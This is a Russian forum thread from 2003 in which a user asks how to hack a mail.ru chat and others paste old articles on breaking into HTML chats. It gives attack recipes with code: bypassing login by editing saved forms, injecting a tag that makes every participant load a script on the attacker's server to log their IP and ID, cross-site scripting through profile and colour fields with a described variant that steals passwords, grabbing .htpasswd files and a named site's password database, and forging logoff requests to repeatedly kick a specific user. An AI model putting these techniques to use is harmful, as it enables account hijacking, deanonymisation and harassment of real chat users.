Народ!, помогите! Расскажите как взломать чат на mail.ru или напишите на мыло [email protected] P.s. Заранее благодарен!
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (yurist @ октября 26 2003,11:19)</td></tr><tr><td id="QUOTE">Народ!, помогите! Расскажите как взломать чат на mail.ru или напишите на мыло [email protected] P.s. Заранее благодарен![/QUOTE]<span id='postcolor'> Я предполагаю, что читатель знает, что такое CGI, и на этом построю своё объяснение. Начал я с малого. В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа <input type=hidden name=cookie value=SP202134> (так в партизанах хранится UserID) Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь www.chat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа <input type=text name=cookie value=SP202134> (что бы можно было их изменять) После этого делаем HTML документ для "сборки чата" из кусков. Т.е. примерно так "First.htm" <html> <frameset rows="80%,20%"> <frameset cols="70%,30%"> <frame name="razg" src="http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+nocookie#end"> <frame name="rigt" src="http://www.chat.nsk.su/right.html"> </frameset> <frame name="bot" src="start.htm"> </frameset> </html> Start.htm - это и есть тот фрейм который я сохранил и изменил После этого я просто броузером открывал эту страницу (First.htm). И сразу(!!! попадал в чат, минуя стандартную процедуру входа. Это позволило : 1. Обходить зарегистрированные имена 2. Прятать свой IP от киллеров, за счет взятия чужого ID'a Дальше мне стало интересно вычислить IP участников. Я обнаружил, что не запрещён тэг <bgsound src="">. Это позволило вставлять в своё сообщение ресурс со своей машины. Сам по себе звук на хер не нужен, но этот косяк позволил вставить в свой месс строку типа <bgsound src="http://MyIP/cgi-bin/spy.exe">. Этот скрипт (spy.exe) вызывался с машины КАЖДОГО участника чата. Это позволило увидеть IP всех (скрипт просто сохранял мне на винт данные из переменной окружения REMOTE_ADDR). Это мне не очень понравилось, тк не понятно было где чей IP. Примерно в это-же время в чате появились приваты. Это значит, что документ в главном фрейме (тот где мессы все) стал называться по другому. До приватов : http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor#end После появления приватов : http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+SP345678#end Где SP456789 - UserID После этого в скрипт (spy.exe) был добавлен вывод ID'a из переменной окружения HTTP_REFERER Ну а сопоставить ник с ID'ом не проблемма, тк ID каждого прописан там же примерно в такой строке <br><b><font color=yellow size=-1>Тут ник</font></b> <font color=black><a href="/cgi-bin/private_form.cgi?SP448188"> <img src=/img/mes.gif border=0 vspace=0></a></font> (Это строка взята из правого фрейма, где можно вызвать функцию "Кто в чате" После этого перестало быть проблемой сопоставление ника и IP. Затем я решил позабавиться с приватами. Используя метод сохранения странички на винт (описанный выше), я получил форму для отправления приватов от КОГО-ТО КОМУ-ТО. Т.е. я смог в отсылаемом приватно сообщении проставлять имя отправителя. Осталось только одно. Я знал, что в чате есть киллеры, но ничего не знал про то, что это, где это, как это. Знал только, что для того, чтобы киллерствовать надо зайти на какую-то страничку. Очевидно, что в этой киллерской страничке показываются имена. Я предположил, что моё имя показываются таким, каким я его ввожу. Исходя из этого, я под именем <bgsound src="http://MyIP/cgi-bin/spy.exe"> MyNick зашел в чат (через прокси), и начал легонько ругаться (мне надо было, чтобы киллеры зашли на свою страничку). После этого (когда меня убили) я разгреб лог моего ВебСервера (OmniHTTPd beta) и увидел там обращение со страници не относящейся к известным мне страницам чата. Я полез на эту страницу и получил запрос на ввод пароля, со словами "Дорогой администратор...". Это приятно согрело душу. Дальше я начал думать, то ли подобрать пароль, то ли ещё что придумать. Но ситуация так сложилась, что я оказался в одной сети с киллером, и, запустив сниффер, я поимел пароль. Ну вот и все. P.S. Ни один из этих приколов уже не работает в партизанах, т.к. это был "дружественный взлом" и обо всем, что я нашел, я рассказал создателю чата. Он все косяки исправил.
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (yurist @ октября 26 2003,11:19)</td></tr><tr><td id="QUOTE">Народ!, помогите! Расскажите как взломать чат на mail.ru или напишите на мыло [email protected] P.s. Заранее благодарен![/QUOTE]<span id='postcolor'> Еще раз о взломах HTML-чатов ЧАСТЬ ПЕРВАЯ, или показываем свое. Основу интерфейса практически любого чата соствляют динамически генерируемые HTML-формы, связанные между собой посредством javascript. В практически всех чатах имя пользователя и пароль (или некий идентификатор, который генерируется при входе пользователя) хранятся внутри формы в качестве скрытого (hidden) элемента и могут извлекаются оттуда посредством скрипта. Заставив кого-либо из посетителей чата выполнить свой javascript, Вы можете, по сути, получить полный контроль над ним - сказать фразу от его имени или выдать его пароль. Для человека, знающего хотя бы основы HTML и Javascript, не составит труда разобраться в структуре интерфейса чата, но вот подсунуть в эту структуру "троянский" скрипт - это проблема. В простейшем случае, когда набираемый вами текст показывается в окне чата "как есть" - без какого-либо контроля - вы просто вводите текст вашего скрипта. Если возникает проблема с ограничением на длину строки - разбейте скрипт на несколько коротких функций. Но в большинстве чатов все же имеется проверка, которая не дает ввод большинства "опасных" тегов, в т.ч. и < script>, либо запрещены теги вообще. Но тем не менее во многих случаях удается ее обойти. Ведь помимо тэга < script> есть еще и казалось бы безобидные теги <A>, <IMG> <FORM> и другие, которые позволяют задать URL как javascript: или задать отклики объекта на события: OnClick, OnMouseOver и т.д. Кроме того, теги могут проверяться в основном окне чата, но не контролироваться при вводе информации о пользователе. И можно вставить скрипт, например, в информацию о себе. Тогда тот участник чата, который имел неосторожность посмотреть вашу информацию получит вместо нее ваш скрипт. Например, следующий скрипт помещенный в личную информацию успешно работал на чате Copris (сейчас чат, похоже, накрылся, так что я смело его помещаю): < script> for( I=1 ; I<=11 ; I++ ){ if( I==1 ) alert( "Че те надо??" ); else alert( "Я тя " + ( (I==11)? "последни" : I ) + "й раз спрашиваю - че те надо" ); } alert("а здесь все равно нету нифика..." top.frames['Inform'].document.forms[0].Accent.options[31].selected = 1; top.frames['Inform'].document.forms[0].Announce.value = "Я люблю тебя, 3APA3A!"; top.frames['Inform'].document.forms[0].submit(); top.frames['Dark'].document.forms[2].submit(); </script> Этот безобидный скрипт дает alertы посетителю, после чего помещает признание любви к 3APA3е от имени посетителя в общее окно чата. Это стимулирует остальных посетителей на просмотр личной информации о 3APA3е. Тем не менее, скрипт можно было сделать и менее дружественным - например, посылать в приват пароль посетителя, который хранится в виде в виде скрытого элемента формы в каждом фрейме. Более того, можно было бы даже написать что-то типа вируса, который, например, меняет имя пользователя на "3APA3A" и ставит ему соответствующий пароль. Таким образом можно "заразить" всех участников чата. Изменение скрипта таким образом, чтобы высылать в приват пароль посетителя и превращать его в 3APA3у (при этом все его сообщения будут исходить от 3APA3ы, но видеть сообщения для нее он не будет), требовало ровно пять дополнительных строчек на javascript (три на первое действие и два на второе). Похожая дыра присутствует в очень многих чатах, где посетителю позволяют выбрать цвет или размер текста. Как правило, вводимые им значения цвета не проверяются. Напрямую, или путем модификации странички, сохранив ее на диске (в том случае, если цвет предлагают не ввести и выбрать из набора), можно, например, в качестве цвета вместо любимого значения 'black' задать '>< script' (если таг печатается в чате как <FONT COLOR=black> Если печатаются кавычки (COLOR="black", то задача несильно усложняется - надо всего лишь их нейтрализовать, например '">< script p="'. Как правило, тип шрифта указывается непосредственно перед фразой введенной посетителем. Так что в своей фразе вы теперь смело можете писать любой скрипт! Так мы имеем возможность закинуть Javascript в общее окно чата, что открывает обширные возможности... Но, нужно отметить, что засунуть закрывающий таг тоже может быть достаточно сложно, а без этого скрипт работать не будет. Впрочем, иногда скрипт просто удается засунуть в COLOR целиком. 2. ЧАСТЬ ВТОРАЯ, или смотрим чужое. И, наконец, существует несколько способов простого хищения паролей из чатов. Если чат расположен на сервере apache, и проверяет имена пользователей по файлу htpasswd (при этом ваш браузер выкидывает окошко с предложением ввести имя и пароль для доступа к ресурсу), то всегда есть вероятность, что нерадивые администраторы положили его в доступный каталог. Можно для этого воспользоваться URL типа http://www.somechat.com/chat/.htpasswd. Точное расположение файла можно узнать стянув файл .htaccess из данной директории. Это, обычно не удается. Но часто удается стянуть его копию, которая осталась с последнего редактирования файла, например http://www.somechat.com/chat/.htaccess~ или http://www.somechat.com/chat/.htaccess.old (в том случае, если копии этих файлов любезно оставлены администратором). Если чат расположен на Микрософтовском сервере и использует ODBC для доступа к базе данных паролей, то можно попытаться стянуть файл с базой, например если она имеет формат Microsoft Access и хранится в том же каталоге, то достаточно просто угадать ее имя, чтобы получить полную информацию обо всех пользователях вместе с паролями Классический пример - чат "Пластилин" (я уже послал уведомление администраторам чата): http://www.plastilin.nnov.ru/talkzone/talkzone.mdb Следует сразу заметить, что почти все сказанное выше справедливо не только для HTML-чатов, но и для других WEB-сервисов, таких как доски объявлений (WWW-boards) или гостевые книжки (Guestbooks).
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (yurist @ октября 26 2003,11:19)</td></tr><tr><td id="QUOTE">Народ!, помогите! Расскажите как взломать чат на mail.ru или напишите на мыло [email protected] P.s. Заранее благодарен![/QUOTE]<span id='postcolor'> Дыры в Чатах Навеяно статьей про то, как чаты поломали... Хотя действительно чат ломать - пара пустяков, но смотря какой чат еще... )) 1. Дырка в чате http://chat.chuvashia.com В общем бываю я иногда (редко очень :-((, но все ж заглядываю) на чате "Город над Волгой" (http://chat.chuvashia.com). Физически находится в Чебоксарах - мой родной город, так что сами понимаете, иногда ностальгия начинает мучить, так что сил нет терпеть, просто приходишь туда и с земляками (больше с землячками конечно ), а их там много) душу просто отводишь... Ну вот значит... Залазим на чат под ником nick... Ага... залезли... Смотрим на нижний фреймик... Сохраняем его у себя и внимательно наблюдаем... Первый прикол. Смотрим на вторую форму... Дальше будут сокращенные цитаты: <form method="POST" action="mainprog.pl"> <input type="hidden" name="action" value="logof"> <input type="hidden" name="username" value=nick> <input type="hidden" name="userid" value=7134NICK8817> <input src="exit.GIF" border="0" name="exit" width="80" height="30" alt="EXIT!" type="image"> </form> ага... все ясно... Так, заменяем на следующую конструкцию <form method="POST" action="http://chat.chuvashia.com/mainprog.pl"> <input type="edit" name="action" value="logof"> <input type="edit" name="username"> <input type=submit> </form> Заметили 10 отличий? )). Ну что... Пробуем ввести имя того, кто в чате сидит, например, "ibz"... Жмем кнопку... Ой... ibz ушел... Странно... опять зашел, еще раз повторили операцию... Ой... Опять ушел... Все... работает значит ))) Сам в это время в чате болтаю, с девчонкой одной... Назовем ее Земфира... nick: Земфира ты фокусы любишь? Земфира: люблю )) nick: А есть щас в чате, кто тебя чем-нибудь обидел? Земфира: Зидан nick: зидан, говоришь? А сам в это время его убиваю )) nick: ой, смотри, чо-то он вылетел ))? Земфира: ), я уж подумала что это ты ))) Зидан в это время еще раз заходит, и я его еще раз выкидываю... nick: да нет, что ты, как я могу это сделать, это ж только админы могут, да и то, зидан же админ, его выкинуть нельзя ))? Зидан заходит еще раз и еще раз, и все так же вылетает Земфира: Да нет! это ты! Классно, я тоже так хочу! ))) Пока я ей обьяснял, что да как, зидан так и не появился... Видать комп перегружал бедолага ))). Ага вот он снова появился... Тут мне конечно нужно было остановится, но раз уж взял заказ, то выполняй его до конца... В общем бедный зидан пробовал влезать в чат, успевал бросить одну фразу (или не успевал, зависело от моей реакции )) и сразу же вылетал еще раз 15 наверно... Ну потом они конечно догадались, выкинули ту девчонку, я выкинул того, кто ее выкинул, меня тоже выкинули... В общем было весело. Мне прикрыли ип - я залез через проксю - посмотрел, что там творится - а там трупы, трупы... зидан озверел, понял наконец, что произошло и просто всех подряд убивал )) Вечеринка удалась )))) Мораль... Ошибка у них (создателей чата) была в том, что они при action=logof не проверяли userid (а это уникальный параметр, присваивается каждому входящему свой, случайным образом), и выкидывали сразу по одному только username. Эта ошибка сразу же была пофиксена, поэтому на этом чате ее не ищите, ищите на других - наверняка она у многих встречается, не на всех чатах, например, уникальными userid пользуются... У многих все гораздо проще ))) Второй прикол... Смотрим теперь на первую форму ))) Надо сказать, что тэги в этом чате запрещены, и поэтому особо не побалуешься... Шрифт не поменяешь, размер не увеличишь... Обидно... Но не страшно... иба как говорится на каждую отвертку есть труба с лабиринтом (звучит не так конечно, но матом мы ругаться не будем ))) Смотрим на первую форму... оля-ля-ля... сколько параметров, некоторые и не используются... О... кажется нашли что надо... среди прочих там есть и такой: <select name="colname"> <option selected value=White style="color: White">White</option> <option value="#F0F8FF" style="color: #F0F8FF">Aliceblue</option> ... и т.д. <option value="#9ACD32" style="color: #9ACD32">Yellowgreen</option> </select> Быстренько меняем эту конструкцию на свою: <input type=edit name="colname"> Так... сделали то что нужно... открываем то что получилось. и в нашем поле вводим следующее: red Face=Arial Size=6 кто догадался - это мы тэг <FONT> просто своими параметрами дополнили ))) Набиваем и отправляем свой текст - оп-па... Большая жирная красная надпись )) (И смачный шлепок от админов за ваши баловства )))) Ну вот, теперь мы крутые, как админы можем красиво писать ). Теперь другая фишечка... а не попробовать ли нам поставить вот так вот " Правильно, правильно догадались. Ставим и что получаем в итоге? Страничка с сообщениями "повисает", и не думай что это у тебя одного так ))) У всех виснет... Дело в том, что там яваскриптик стоит, а он как раз на этой " спотыкается, возникает ошибка, и страничка дальше не грузится... по крайней мере у многих... )) НУ что... гадость это конечно порядочная, но что поделать - аляфер ком аляфер как говорится )) Можно конечно утонченней сделать - послать такое сообщение в приват врагу и он лишается привата на некоторое (иногда даже очень длительное ))) время. Ну что значит, рассказал я одному знакомому значит, он и побаловался немножко ))). В общем чат на ремонте у них сейчас ))) Мораль... Ошибка у них в том что: первое - они не проверяли то, что именно приходит по параметру colname второе - они не конвертили " в " (хотя даже если б и конвертили - все равно неправильно было бы ))). Ладно хоть догадались > и &rt убирать... а то сами понимаете: &rt< дальше любой тэг, и пиши пропало... )))
Если цвет в форме задается так: <TD><SELECT style="WIDTH: 250px" name=color> <OPTION style="BACKGROUND: #000000; COLOR: #ffffff" value=#000000 selected>черный<OPTION style="BACKGROUND: #0000ff; COLOR: #ffffff" value=#0000FF>синий<OPTION style="BACKGROUND: #008000" ----- как его можно изменить?
